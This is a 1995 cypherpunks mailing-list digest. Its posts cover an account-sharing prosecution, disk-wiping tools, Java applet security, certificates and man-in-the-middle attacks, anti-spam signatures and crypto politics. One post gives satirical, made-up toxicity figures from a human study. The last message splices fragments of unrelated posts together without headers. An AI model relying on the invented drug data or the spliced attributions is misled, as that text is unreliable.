From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Date: Mon, 9 Oct 95 06:46:46 PDT
To: cypherpunks@toad.com
Subject: Re: LACC: Account sharing leads to false imprisonment
Message-ID: <199510091346.OAA24239@neptune.ebi.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Amazing! If I'm allowed to express my opinion!

>Thought you might like another perspective:
>
>...
>>                             A GORRIE STORY
>> 
>> Here's the background: in October of 1994, Hirsh's stepbrother, a U of
>

What I find so amazing is the fascinating arguments exposed here. Let's
see... First, let me say I start from a different point of view.

I see the University as a place for forming people and distributing ideas,
not juts the ideas of the "Establishment", but all kind of ideas. A place for 
the free interchange of all ideas and the formation of new persons.

Now, all your message transpires a special horror against the dispersion
of "anti-establishment" ideas. Of things that one could find "disturbing"
from some point of view...

Oh well, I wonder what it would have been if the arabs in Spain had only
translated the Koram in the middle ages, instead of translating all the
ancient wisdom and preserving it for all of us. Even if it conflicted with
*their* beliefs. It would have been great not to have Aristotles or Plato
at all. Just the Koram.

From your message, it looks like you want instead the Spanish Inquisition back:
if someone distributes strange ideas -anarchist, communist, etc...- that 
person is a risk for the stablishment and should be punished. Isn't it?

>Ignorance of the law is no excuse, and being easy to catch doesn't make
>you innocent of a crime.
>
	Yeah, but not showing volunteer to hide, expressing opinions openly,
is not being easy to catch, it's being confident in one's freedom of speech
and on the democratic system to protect it. Even in spite of overzealous
system administrators.

>> facility computer, received a complaint from someone at the University
>> of British Columbia about The Anarchives being posted to net news. The
>> person wanted it stopped.
>
>Interstate transport of stolen (presumably copyrighted) property, possible
>violation of national laws of both nations.  Unauthorized use of the
>computers at the University of British Columbia.
>
	Well, I don't know if that was copyrighted property. But, if it was,
it was up to the (C) holder to decide what actions if any to take. BSD-Unix 
is copyrighted code, but I wouldn't say that all the copies around are illegal,
or stolen.

	Unauthorized use? May I say that if that person asked someone (whomever)
for permission, then it is whoever gave permission (if any) who should be
pursued instead? I guess that if a poor guy is sold the Golden Gate, it is not
that poor guy's fault as much as the "seller's".

	Ah, but that guy was distributing "anarchistic" information: he
must have been pretty bad intentioned then. No one should have "unauthorized
ideas" and even less dare to distribute or share them. I see.

	Great that if someone complains about the distribution of 'X' kind
of ideas there's always a willing sysadmin to hunt the witch instead of
defending freedom of speech. Great.
 
>> have different last names, Gorrie concluded a larger hacker conspiracy
>> was afoot.
>
>Reasonable assumption.  The only way to find out different would be to
>violate the users' privacy by reading their mail, etc.
>
	What? May I suggest that, if the account has a owner, and a system
manager, and all that, those people should be asked prior to jumping to
conspiracy theories? The same kind of reasoning lead many innocents to die
with the Spanish Inquisition: hey, they were plotting with the devil against
god laws. Sorry, but I think a phone call to the implicated persons can
easily clear all those doubts without "electronic surveillance" as you propose.

>Collected possible evidence.  A good idea.  Allerting potential criminals
>
	Yeah. I suppose that if they were expressing distrubing ideas, they
were "potential criminals"... What else could they possibly be?

>If he turned out to be a terrorist who was planning to blow up a
>building, you would have called this a tremendous piece of police work,
>they could have written a million-selling book, and you would hail the
>sysadmin as a computer age hero.
>
	Great! I guess that prettily summarizes all: "if" he had turned to
be a "fill in your fears here". Just the same as it was with the Inquisition,
if they were good guys they shouldn't fear torture or dying for God. And it
was better to torture innocents than allowing any "potential bad guy" to get
along.

>So Hirsh agreed that he had been illegally using the computer system
>and the case was settled with a monetary fine.
>
	I bet so. Under torture many innocents also confessed. And faced with
a multimillion dollar trial which, if you can't afford- will take you to
jail (which can be a real torture), I guess that most innocents will prefer
to go along with a smaller fine.

	It's often better to be alive and free than being the dildo of a
homsexual homicidal maniac in jail. Or visiting the dungeons of the 
Inquisition. Of course, if instead of distributing 'X' files he had just
killed his wife and her lover, and were multimillionaire, it would have
been quite different. Wouldn't it?

>> After subjecting Hirsh to complete and devastating public humiliation,
>> U of T was now pleading for discretion.
>
>After Hirsh broke the law, he is trying to get even for being caught by
>harassing the people who caught him.
>
	So, after one person was faced with an humongous bill, dispropor-
tionate, faced to an expensive trial he couldn't afford and forced into an
agreement that's being sold as a confession, and being publicly given a
walk around the city dressed as a damned heretic, he shouldn't have even the
right to complain.

	Obvious. We don't want the faith in the Inquisition to diminish, do we?

				---

Look, I don't really know about the case. But I do really understand one thing:
if this guy hadn't posted what some person considered were "pernicious ideas"
he would have never been tracked down, villipendiated and taken to trial.

I don't care about if he was using public resources for something they shouldn't
be. That's something else to be discussed. Is it wrong to use a University
to spread ideas, specially when the mainstream media avoid them? I won't
comment on that.

But that someone can start a witch hunt 'cos some other one is posting some 
special kind of information... Let's say, I can't consider that justification
enough.

So. I think you have made a great point for the defense of cryptography: if 
we want to have free thought and free speech, and avoid a new Inquisition, 
that's the only way. But I'm sure that if these guys had encrypted their 
messages that would have been taken more as a demonstrationof their *evil*
purposes.

After all, if they had nothing to fear, why hide? Why avoid torture? But they
didn't hide, and we have seen... yes. Long life to thought control!

				jr
--
	These opinions are mine and only mine. Hey man, I saw them first!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J.E. Davidow" <jed@home.interaccess.com>
Date: Mon, 9 Oct 95 12:52:30 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <199510091947.OAA23150@thymaster.interaccess.com>
MIME-Version: 1.0
Content-Type: text/plain


On  9 Oct 95 at 13:59, dmandl@panix.com wrote regarding Re: PC disk 
wipe software:

> On Mon, 9 Oct 1995, Perry E. Metzger wrote:
> 
> > I thought I'd ask here, since its related to a lot of the stuff
> > people have written for the PC platform in these parts. I need to
> > securely wipe a bunch of data from an MS-DOS hard drive, so that
> > it can't be recovered. Are there any readily available utilities
> > for this? Will any of them selectively erase only data that isn't
> > allocated to existing files?
> > 
> > Perry

There are several file, directory and/or disk erasing utilities on 
the web and commercial area today. 

Shred is located on WEB in some of the Simtel Libraries. It will not 
only delete the file from the directory, but it writes zeros over the 
data itself, including all of the fragments left at the end of the 
file's cluster. It also will write over the free space left on the 
disk as well. It performs this operation only once per execution.

Another "wipe" software is "Real Deal.zip".  It's virtue is that is 
writes a series of patterns to the disk depending upon the level of 
security you request. It can remain memory resident, intercepting all 
DOS delete requests and write over at least 5 times with different 
patterns the data your deleting. Watch how much longer a delete takes 
if your at the" Real Dewd" level. There are a couple of utilities from 
Norton, etc. that will perform a higher level of wiping. Including 
the entire disk, directories, etc. The will write several more times 
that either RealDeal.zip (Real Delete) or Shred. 

The last time I saw, the government 'standard' for "wiping" its own sensitive data was at least fifteen times  with different patterns. How secure your erased disk will stand up to a concerted effort by law 
enforcement, NSA or someone truly looking for what's on your disk 
remains questionable at best. But to the average person both Shred or RealDeal is 
good enough to keep your wife's attorney, your roommate, co-worker or your girl friend out of 
your personal communique's.

Remember too,  that word processors and other software write all over you 
disk and that its' probable that fragments of data that you wish to 
delete are attached to or in other files. 

J.E. Davidow
jed@interaccess.com
Signed JEDKEY.asc

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAvWekAAAEEAOASA2sxixXBIzn40bN/ybwZ6lOBAmLo06DqG8eh2VpnE0kp
i0cSiOQARzOpx3REbJWCp4+XE3Dudg534V47JWoiH0VFgJTCG6yZ7kXJjxXwXeYf
KD0zRlkoU1wYcjfDC2vEoBWh36I/7HX+GiSEnFQ5rJgm9X7spOMRupiV7141AAUR
tCJKLkUuIERhdmlkb3cgPGplZEBpbnRlcmFjY2Vzcy5jb20+iQCVAwUQMGO82F2s
KelIgrYVAQFT7AP/TjfpK4Zljs2RFUYGZuKPEJgMp+PC1jmtuAalaoufhv5Bdosk
lixdahjJ1y5a2Nv/mId4xhT6/WJDN62solxdYBCyzZWAxg4X88igP23xeGreUhg+
A7u1Gx1Ebr5QPqiTV7B8AgJT9Y2xVZw76zQnFxZAGiZqk9IuRgVuldj3gv2JAJUD
BRAwYgxV4xG6mJXvXjUBAWuqA/9h6AORiSqkNwrSTmm5z1CoNrS1q6L3LMSmnmgZ
Xh3AbuqbbJum06gVRXo4QITR71iBx7HjKg3kMeK6+8+vIabXzL0T7TtdiLkhcCo5
FULB+0W5aUBiXVC0amMP+tJE4I8Splr5MfuDlGddMPqrbB3TplweTJ1muE3k+KWK
RNspGw==
=1Iv2
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 9 Oct 95 13:01:02 PDT
To: owner-cypherpunks@toad.com
Subject: Re: netscape mail starts java attachments upon get new mail...
Message-ID: <9510091958.AA23589@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>As far as I know Java apps can only make network connections to the
>IP address they were loaded from.

What part of the state of my machine can they access and send out
to the "home port"?  Can they read /etc/passwd, make NIS requests,
etc?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 9 Oct 95 13:01:48 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: NSA Realists v. Nuts
In-Reply-To: <199510082019.QAA15164@book.hks.net>
Message-ID: <Pine.SUN.3.91.951009155445.24837A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 8 Oct 1995, Lucky Green wrote:


> Let me illustrate this with an example. During my visit to Dachau
> Concentration Camp, I saw original lab notebooks of experiments designed
> to increase the survial rate of pilots downed above the cold waters of the
> North Sea. A noble cause.
 
Let me illustrate this with an example. During my visit to the Center 
for Disease Control in Atlanta, I saw original lab notebooks of experiments
designed to cure Aids, Hanta virus, etc. A noble cause.


But all of this noble research was obtained by holding the entire 
population of a nation in thrall.  These people were threatened with 
death if they didn't support this research.  Armed men herded resisters 
into camps guarded by high walls and barbed wire.

All government research Nazi or whatever is soaked in the blood of 
millions.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Klaus <cklaus@iss.net>
Date: Mon, 9 Oct 95 13:06:30 PDT
To: cypherpunks@toad.com
Subject: Announcement: Alert Mailing List
Message-ID: <199510092303.QAA16855@iss.net>
MIME-Version: 1.0
Content-Type: text/plain



Announcing a new security mailing list - The Alert.

The Alert will be covering the following topics:

	- Security Product Announcements
	- Updates to Security Products
	- New Vulnerabilities found
	- New Security Frequently Asked Question files.
        - New Intruder Techniques and Awareness

To join, send e-mail to request-alert@iss.net and, in the text of your message
(not the subject line), write:


        subscribe alert

To remove, send e-mail to request-alert@iss.net and, in the text of your message
(not the subject line), write:

        unsubscribe alert

This is a moderated list in the effort to keep the noise to a minimal and
provide quality security information.

If your site is interested in network security, we put out several
FAQes (Frequently Asked Question) that cover the following main areas
of topic:

	Vendor Contacts
	  - Who is the security contacts at IBM, HP, Dec, Motorola, etc.
	  - Web page at:  http://iss.net/iss/vendor.html

	Patches
	  - List of all security related patches catergorized by OS type.
	  - Web page at: http://iss.net/iss/patch.html

	Compromise
	  - Check list of things to do if your machines are compromised.
	  - Web page at: http://iss.net/iss/compromise.html

	Anonymous FTP Security
	  - How to correctly set up FTP and check for vulnerabilities.
	  - Web page at: http://iss.net/iss/anonftp.html

	Sniffers
	  - What they are. How they work. How to detect them. And solutions.
	  - Web page: http://iss.net/iss/sniff.html

	Security Mailing Lists
	  - A comprehensive list of security mailing lists.
	  - Web page: http://iss.net/iss/maillist.html


If possible, it might be a good idea for you to add links to the above
web pages on your own Web server and point people who need to know
some of the network security issues to the web page.  It is
possible to point to all of the FAQ pages at:

	http://iss.net/iss/faq.html

-- 
Christopher William Klaus	     Voice: (770)441-2531. Fax: (770)441-2431
Internet Security Systems, Inc.            "Internet Scanner lets you find
2000 Miller Court West, Norcross, GA 30071   your network security holes 
Web: http://iss.net/  Email: cklaus@iss.net   before the hackers do."



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Mon, 9 Oct 95 15:07:10 PDT
To: cypherpunks@toad.com
Subject: Re: NSA Realists v. Nuts
In-Reply-To: <Pine.SOL.3.91.951009160553.1148B-100000@welchlink.welch.jhu.edu>
Message-ID: <199510092206.QAA07357@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



C.J. Leonard writes --

> On Mon, 9 Oct 1995, Duncan Frissell wrote:
> > 
> > All government research Nazi or whatever is soaked in the blood of 
> > millions.
> 
> Acknowledgements:
> CJL is supported in part by NIH grants ES05777 and CA61949.

I'm paid by the DOE. Constantly having to get the upholstery in my Bronco 
cleaned. (Don't do this at home, kids. Government research is a messy
business.)


                                 -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 14:15:11 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510091926.MAA08047@infinity.c2.org>
Message-ID: <9510092114.AA24726@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hfinney@shell.portal.com writes:
 > >just alice. From Bob's perspective, Alice is really an alias for
 > >ISP+Alice. (The same goes for Alice in the other direction.)
 > 
 > What difference does it make?  I'll tell you.  It means that their
 > conversation is not private!  It means that their cryptography is
 > useless, that it has failed.

But if by all means available Bob and Alice satisfy themselves that
their conversation *is* secure, then (until they're proven wrong) it
might as well be.  They have satisfied themselves *at least* that
their messages are in fact encrypted at some point, just as if they
walked into a room, looked around, and satisfied themselves that there
are no hidden microphones.  I don't see how you can ever do any better
than this if you're willing to imagine arbitrary powerful
men-in-the-middle.

 > This is not a useful or appropriate way to think of the world, IMO.  If
 > you do this, then from your perspective people become bafflingly
 > unreliable.  I wrote all about this before.

Gee, in my reality people already *are* bafflingly unreliable.  (You
must not be watching enough afternoon trash talk shows.)

 > Try to think of it not in relativistic or epistemological terms, but
 > rather look at it in terms of reality.  The real world exists, and in it
 > exist real people.  We can agree on this much, right?  Two of these
 > people want to communicate securely.  That is not such a stretch of the
 > imagination, is it?  By "communicate securely" I mean they exchange
 > information in such a way that other people don't receive it.

What, however, is the real difference between the MITM scenario in a
purely electronic relationship, and a "phony personality in the
middle" attack on a "flesh" relationship?  You *think* you're working
with a realtor to buy a house, but in fact it's a con artist that
betrays your trust and rips you off.  You *think* you've found the
love of your life, but in reality it's just somebody who wants to use
you for sex.  There are no guarantees.

Let me ask this:  how do you *guarantee* that you're having a truly
private in-the-flesh correspondence with a person?  And, having done
that, how do you *guarantee* that the other person will behave in an
absolutely trustworthy fashion?

 > Now surely it is clear that with this definition of the problem,
 > approaches which redefine people to mean people+eavesdroppers are not
 > responsive.  Perhaps the motivation to do so is simply the belief that
 > the problem is not solvable as stated.  If so, I'd like to hear someone
 > say this.

I certainly don't know how to solve it, but I wouldn't trust me if I
were you :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 16:17:41 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <21628.9510092240@exe.dcs.exeter.ac.uk>
Message-ID: <199510092316.QAA09588@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


It occurs to me that perhaps I have been missing a point here when people
argue that having a "man in the middle" is not that different from
various forms of secure communication, such as where Bob has multiple
personalities or is a committee.  I have been taking this to mean that we
should therefore not worry about MITM attacks, which seems crazy to me.

Instead perhaps this was meant as a "reductio ad absurdum" argument for
why MITM attacks cannot be prevented in the scenario where people have no
out-of-band contact.  Anything which could detect and prevent MITM
attacks could, by this analogy, detect whether Bob had multiple
personalities.  Since the latter is obviously impossible, the former must
be as well.  Hence the problem has no solution and we should not
waste much time on it.

I don't fully agree with this but at least it is not as bizarre as the
first interpretation.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Mon, 9 Oct 95 13:27:58 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: netscape mail starts java attachments upon get new mail...
In-Reply-To: <9510091958.AA23589@sulphur.osf.org>
Message-ID: <QAA01714.199510092027@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9510091958.AA23589@sulphur.osf.org>, Rich Salz writes:
>>As far as I know Java apps can only make network connections to the
>>IP address they were loaded from.
>
>What part of the state of my machine can they access and send out
>to the "home port"?  Can they read /etc/passwd, make NIS requests,
>etc?

As far as I know Java Applets either can't do file I/O, or can only
do it in a small area of the file namespace that you set aside for it
(like ~/java-data).  I don't recall any classes that let you make local
NIS requests.  (however this does imply that if you set up a Java Applet
writable area so that you can use the nifty Java rolodex, that other
Java applets could damage that data or send copies to "home base" - I
don't know if there is any finer-grained access, and I havn't yet been
able to do more then _read_ all the Java docs from Sun.  All thery, no
experiance.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Mon, 9 Oct 95 13:32:30 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: NSA Realists v. Nuts
In-Reply-To: <Pine.SUN.3.91.951009155445.24837A-100000@panix.com>
Message-ID: <Pine.SOL.3.91.951009160553.1148B-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Oct 1995, Duncan Frissell wrote:

> 
> On Sun, 8 Oct 1995, Lucky Green wrote:
> 
> 
> > Let me illustrate this with an example. During my visit to Dachau
> > Concentration Camp, I saw original lab notebooks of experiments designed
> > to increase the survial rate of pilots downed above the cold waters of the
> > North Sea. A noble cause.
>  
> Let me illustrate this with an example. During my visit to the Center 
> for Disease Control in Atlanta, I saw original lab notebooks of experiments
> designed to cure Aids, Hanta virus, etc. A noble cause.
> 
> But all of this noble research was obtained by holding the entire 
> population of a nation in thrall.  These people were threatened with 
> death if they didn't support this research.  Armed men herded resisters 
> into camps guarded by high walls and barbed wire.
> 
> All government research Nazi or whatever is soaked in the blood of 
> millions.
> 
> DCF
> 

Deep thinking Duncan, government bad, me good. . . . . . 

I presume in your moral superiority you also refuse to use public roads 
and bridges, purchase your food supplies on the black market to ensure 
that they could not possibly have been USDA inspected, and in every other 
way endeavor to never eat the fruit of the poisoned tree that is the USGovt.
What a heap of self-righteous horseshit.  

Just call me a modern Mengele, and excuse me while I go bathe in the 
blood of millions. . . . .

Acknowledgements:
CJL is supported in part by NIH grants ES05777 and CA61949.


C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 9 Oct 95 13:35:28 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Crypto's Role in Evil?
In-Reply-To: <ac9dd5a302021004dfe5@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951009161648.24837C-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 8 Oct 1995, Timothy C. May wrote:

> liberalism" and law-based "social justice" policies. My personal view is
> that an ever-shrinking elite (20%, then 10%, then 2%, ...) will dominate
> high-value transactions, with the mass of humanity offering little or
> nothing worth buying. Just my view.)

I hear this from commies all the time but I don't have to take it from a 
fellow libertarian.  I expect commies to be economically illiterate.

The notion that the unskilled have nothing to sell is the same argument 
as saying that poor, third-world nations have nothing to sell (and 
should protect their markets via tariffs).  Commies these days (The End 
of Work - by anti technologist Rifkin) make the same claim.  This implies 
that wants are limited.

Most economists operate on the assumption that wants are unlimited.  
Certainly I do.

In addition to becoming skilled, the unskilled can supply personal 
services that we as primates will still like to have suppled by people.  
If "magically" supplied goods make goods cheap, labor becomes dearer by 
definition.

Some people seem to think that the theory of comparative advantage means 
that the person/nation with the lesser comparative advantage can't do 
anything.  What it really means is that the more efficient concentrate on 
those things they are more efficient at while the less efficient 
concentrate on less valued tasks which the more efficient could do better 
if it was worth it to do so but it's not.

DCF

"Who notes that waitrons of the present day have a much higher real 
income than physicians of the 19th century."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 9 Oct 95 13:33:21 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Crypto's Role in Evil?
In-Reply-To: <ac9eafac0202100433c6@[205.199.118.202]>
Message-ID: <199510092035.QAA01945@homeport.org>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:

| this being a strong cryptography group, this is a good time to mention to
| newcomers to the list that the book "Snow Crash," by Neal Stephenson,
| offers a wickedly satirical look at a possible future for America.

	Speaking of Stephenson, he views the Snow Crash future as not
a particularly bad one.  Sure, some of the companies are evil, but
they are not so evil, or as powerful, as governments have been this
century.

	Also, Klaus, I'll offer up the following data on
Iboviroxinase-D.  LD-50 of 490mg in 20 male subjects aged 16-28.
Subjects were paid volunteers.  Releases included in study.  Onset
time of les than one minute from administration of last dose.  Doses
were administrated intraveneously every 4 minutes as 50mg of
Iboviroxinase-D in saline solution.  Complete study will be encrypted
to you on the payment of $35,000 to our account.

	While medical data based on various studies will probably
become available, there will also be a value to forging such studies
(after all, how is Tim to know?  (Its worth a bit of time for $35,000
to see if Tim can tell the difference.)  Also, expect police to be
engaging in undercover work to try to find people who buy these
things.

	Encryption is not a cure all for criminals.  It makes some
things easier to do, but if the number of crimes drops down to murder,
kidnapping, theft and rape, the police will have the time to track
down people who kidnap 20 people for a toxicity study.  (And good
studies will probably take more people than that; partly because its
not a refined science, partly because people are so variable.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Sun, 8 Oct 95 23:41:08 PDT
To: crypt-request@cs.aukuni.ac.nz
Subject: PGP Moose anti-spam authentication ready to go
Message-ID: <9510090642.AA41873@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain



Yesterday the PGP Moose Checking Daemon did its
first automatic cancellation. The offending message
lasted less than a second.

For some months I've been working on some scripts
collectively called "the PGP Moose", which are
intended to cryptographically authenticate news
postings, and send notifications or cancellations
when postings fail the authentication. This message
is to announce that the moderators' and users' end
of the software seems to be ready to go, and I'm
looking for testers who have a better and more
complete newsfeed than I to cooperate with running
the cancelling daemon part of it. Both parts are
tested to the best of my ability.

The aim of this software is to monitor the news
postings of moderators of USENET newsgroups, and to
automatically cancel forged messages purporting to
be approved.  This can be extended to the approvals
of individual users to automatically cancel messages
that appear without having been authorised by the
user. This has (obviously) been prompted by the
recent spammings and other events.

This software and protocol is designed around
cryptographic signatures.  The protocol is designed
to allow the use of different signature techniques.
This implemention assumes the use of PGP signatures,
but can be easily modified to use others, such as
the Digital Signature Standard.  PGP was chosen for
its widespread availability around the world.

Basically, there is a script you run which
inserts a special header based on a PGP signature
of the important parts of the article. When an
article arrives at a site running the PGP Moose
Checking Daemon, the existence and correctness
of this special header are checked, and either
someone is notified or the article is cancelled.

PGP, the crux of the cryptographic software, was
written by Phil Zimmermann <prz@acm.org>, who
otherwise has nothing to do with this. The cryptographic
framework was written by me <Greg_Rose@sydney.sterling.com>,
as were the INN news system hooks.

The <A
HREF=http://www.sydney.sterling.com:8080/~ggr/pgpmoose.html>README</A>
is available for browsing, so I won't post it here,
but I will happily send it (or the scripts) to people
who can't get it easily on the Web.

-- 
Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 14:47:55 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <ac9ea8f3010210049f44@[205.199.118.202]>
Message-ID: <9510092146.AA28192@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hfinney@shell.portal.com writes:
 > >3) You can set up some sorts of communications tests to "probe" for a
 > >MITM situation, perhaps by passing through "seeded" information (data
 > >taggants?).
 > 
 > I will agree that there are alternatives to certificates.  

I'm a little confused, I guess.  What is it about certificates that
you'll trust with such confidence?  How do you know that the guarantor
of a certificate wasn't spoofed by an MITM attack?  How do you know
that the certificate itself wasn't spoofed?

 > >I don't think it is irrelevant, I just think it's orthogonal to the
 > >issue of whether a certificate for a key<-->entity relationship is
 > >considered to be the key or an adjunct to the key.  I could be wrong,
 > >of course.
 > 
 > The POV I am really arguing against is the one that defines identity to
 > be a key, that states that in communicating with a key you are by
 > definition communicating with the person you have in mind.  The man in
 > the middle attack does not exist because from your point of view the
 > entity at the other end of the communication channel is just the MITM
 > plus the person you think you are talking to.  

I think it's more correct to say that the MITM attack is acknowledged
to be possible, but realistically no more of a threat than in a
certificate model.   And note the "I think", and this warning that I
could be wrong.  (Or I could be an MITM...  bwahahahaha!)

 >                                                    This idea has been
 > expressed many times by other people in this discussion, and it is this
 > which I think is fundamentally flawed and even dangerous because it
 > encourages the use of untested keys.  In fact it seems to define away
 > the question of whether a key is real or fake.

Oh now wait a sec here; I don't think anybody's advocated using
"untested" keys.  It's still perfectly reasonable to establish
networks of reliable information focused on a key.

If I electronically "encounter" Alice and decide to begin a secure
conversation, we initiate a key exchange.  I can then go to as many
already-trusted entities as I like in an attempt to verify that as
many attributes that are claimed to be associated with the key are
really there as I desire.  If Alice wants to buy a widget from me, I
can ask other businesses whether they've ever had problems collecting
from that key.  If I want to buy a widget from Alice, I can ask
friends whether they've gotten good widget from that key.  If I'm
interested in a little e-hanky-panky, I can ask around the sleazier
corners of the net to see whether Alice is the kiss-and-post type.

Somebody's going to have to explain to my thick skull how it is that a
certificate system makes this process any different, fundamentally.  I
mean, it may be that there's more superficial security, but I don't
see where there's any additional risk truly introduced by using the
key itself as a "True Name".  Maybe the real question is, how does a
certificate system give me the confidence that there really is an
"Alice" according to some definition of "really" that satisfies me?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Mon, 9 Oct 95 13:50:47 PDT
To: cypherpunks@toad.com
Subject: Chaum's patents
Message-ID: <Pine.3.89.9510091650.A96856-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Sorry if this has been stated before, but exactly when do Chaum's first
set up e-cash related patents expire? I looked it up in applied crypto
the last time I had my hands on it and couldn't find the dates. 

How many (and what) patents are there in this field anyway? (don't bother 
with that if it's too long to answer)

TIA

 my visit to Dachau
> Concentration Camp, I saw original lab notebooks of experiments designed
> to increase the survial rate of pilots downed above the cold waters of the
> North Sea. A noble cause.

Well I don't think so. The pilots missions were to bomb the cities of England.
This was in turn to further the meglomaniac plans of the Fuhrer to create
a european police state under his personal rule with all objectors murdered.

Analysis of the aims of the research must not simply stop at the immediate
result but through to the wider goals towards which the research was 
intended to contribute. In this context we see that the objective was not to
save lives but to destroy them in the furtherance of a plan to enslave the
entire population of Europe. 

spread, 
> easy employment.

I'm not a libertarian, or an anarcho-capitalist.  I do, however, support 
rapid deployment, without restrictions, of strong crypto.  Here's why:

(1) It is impossible to stop these technologies; someone on the list 
recently reminded us that a bright fourteen year old could reproduce the 
basic functionality of PGP in a brief period of time.  The mathematics 
of, say, RSA, are fairly basic.  I think it's unreasonable to outlaw 
multiplication of prime numbers, don't you?

(2) While these technologies allow people to violate the law, I have 
enough faith in humanity to believe that civilization won't collapse as a 
result.  There have always been criminals, and there have always been 
revolutionaries.  Only recently has "The State" been able to supress 
these forces without maintaining a physical presence.  Crypto merely 
returns us to that default.  

	An example of this is, for example, "What if terrorists are going
	to blow up a big important building, but we don't know which one?"
	Before wiretapping, and even today with groups which insist on 
	physical presence in a secure location for planning, you had to
	infiltrate the group.  This will still work.  LEAs don't like this
	sort of activity because of the inherent risk for the infiltrator.
	That's not a good reason to limit these technologies.

(3) These technologies also allow honest, law-abiding citizens to protect 
themselves from criminals, both within and outside the government.  
Industrial espionage can be defeated through strong crypto, for example.  
J. Edgar Hoover would have been powerless to harass Martin Luther King, 
jr. had MLK had access to strong crypto.


Obviously, these aren't the only reasons to use strong crypto, and 
everybody will almost definitely disagree with them as I've described.  
But it's one answer, anyway.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





